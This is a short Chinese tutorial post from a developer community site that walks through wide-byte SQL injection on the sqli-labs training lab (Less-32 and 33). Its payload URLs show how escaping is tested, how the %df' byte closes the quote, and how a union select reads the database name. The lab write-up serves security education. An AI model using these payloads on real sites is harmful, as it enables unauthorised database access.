AI 助理
备案控制台
开发者社区 数据库 文章 正文

小课堂 -- 宽字节注入

2024-02-22 25
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 小课堂 -- 宽字节注入

环境sqli-labs

 

less 32

 

一、输入特殊字符,都被转义了

http://192.168.1.121/sqli/Less-32/?id=1\

image.png

 

http://192.168.1.121/sqli/Less-32/?id=1'

image.png

 

http://192.168.1.121/sqli/Less-32/?id=1''

image.png

 

二、构造宽字节闭合

http://192.168.1.121/sqli/Less-32/?id=1%df' --+

理论上%81-%FE均可

image.png

 

三、联合查询数据库

http://192.168.1.121/sqli/Less-32/?id=-1%df' union select 1,database(),3 --+

image.png

 

less 33

同上

 

禁止非法,后果自负

文章标签:
数据库
sumith
目录
相关文章
ROCKY_817
|
6月前
|
C++
限定宽度(补充)
该内容介绍了一个关于小数显示宽度限定符的示例。在C++代码中,`printf("%5d", 123.45)` 输出结果为 `123.45`, 其中数字前有2个空格,后有4个空格。这是因为默认小数精度为6位,所以123.45后有4个空格,而`%5d`指定至少占用5位,导致前面出现2个空格。
ROCKY_817
32 1
聂聂脸
|
6月前
|
编解码 前端开发
前端长度单位的区别是什么?
前端长度单位的区别是什么?
聂聂脸
45 2
sumith
|
6月前
|
关系型数据库 MySQL 数据库
宽字节注入讲解
宽字节注入讲解
sumith
50 1
sumith
|
6月前
|
关系型数据库 MySQL 数据库
宽字节注入
宽字节注入
sumith
32 1
五行缺你994
|
SQL 安全 程序员
宽字节注入详解
宽字节注入详解
五行缺你994
132 0
sumith
|
6月前
|
数据库
22、宽字节注入
22、宽字节注入
sumith
33 0
sumith
|
6月前
|
安全 关系型数据库 MySQL
MySQL注入 -- 宽字节注入
MySQL注入 -- 宽字节注入
sumith
43 0
Hello,C++!
|
6月前
窄字节宽字节的互转(string--wstring)
窄字节宽字节的互转(string--wstring)
Hello,C++!
59 0
123hello123
|
12月前
|
Python
使用python来理解宽字节注入
使用python来理解宽字节注入
123hello123
42 0
肖宜
|
前端开发 JavaScript API
前端动画--字节青训营
前端动画--字节青训营
肖宜
145 0